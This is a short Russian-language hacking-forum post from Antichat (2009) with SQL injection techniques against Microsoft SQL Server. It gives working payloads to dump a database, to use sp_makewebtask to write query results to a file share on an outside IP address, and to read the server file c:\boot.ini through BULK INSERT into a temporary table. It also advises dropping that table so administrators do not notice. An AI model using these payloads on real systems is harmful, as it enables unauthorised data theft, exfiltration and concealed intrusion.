11.07.2009, 15:22
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
Провидение Иньекций в MSSQL сервер от Microsoft.
дамп базы:
BACKUP DATABASE [base] TO DISK = N'c:\path\'
можно использовать sp_makewebtask, чтобы записать запрос в HTML:
'; EXEC master..sp_makewebtask "\\10.20.30.40\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
указываемый IP должен иметь папку "share" с доступом для Everyone.
http://forum.antichat.ru/showpost.php?p=523825&postcount=36
Сообщение от Читаем файлы
Для начала создадим таблицу file с полем text
;create table file(text varchar(8000))--
далее запишем туда файл используя конструкцию bulk insert
bulk insert file from 'c:\boot.ini '
и прочтем собственно
select top 1 text from file
Удалим дабы не спалили админы
;drop table file
|
|
|